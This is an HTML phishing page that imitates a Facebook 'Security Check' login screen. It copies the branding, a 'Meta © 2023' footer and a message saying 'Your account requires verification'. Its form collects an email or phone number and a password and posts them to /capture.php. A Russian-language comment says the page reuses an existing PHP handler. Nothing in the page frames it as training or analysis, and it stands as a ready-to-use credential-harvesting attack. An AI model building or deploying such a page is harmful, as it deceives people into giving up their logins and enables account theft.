<!DOCTYPE html>  
<html>  
<head>  
    <title>Facebook – Security Check</title>  
    <style>  
        body { font-family: Arial; background: #f0f2f5; }  
        .container { width: 400px; margin: 100px auto; }  
        .logo { color: #1877f2; font-size: 42px; font-weight: bold; text-align: center; }  
        .form { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }  
        input { width: 100%; padding: 12px; margin: 8px 0; border: 1px solid #ddd; border-radius: 6px; }  
        .submit-btn { background: #1877f2; color: white; border: none; padding: 12px; width: 100%; border-radius: 6px; font-weight: bold; }  
    </style>  
</head>  
<body>  
    <div class="container">  
        <div class="logo">facebook</div>  
        <div class="form">  
            <h3 style="text-align: center;">Your account requires verification</h3>  
            <!-- Используем существующий PHP-обработчик -->  
            <form action="/capture.php" method="POST">  
                <input type="text" name="username" placeholder="Email or phone number" required>  
                <input type="password" name="pass" placeholder="Password" required>  
                <button type="submit" class="submit-btn">Continue</button>  
            </form>  
            <p style="text-align: center; font-size: 12px; color: #777;">Meta © 2023</p>  
        </div>  
    </div>  
</body>  
</html>  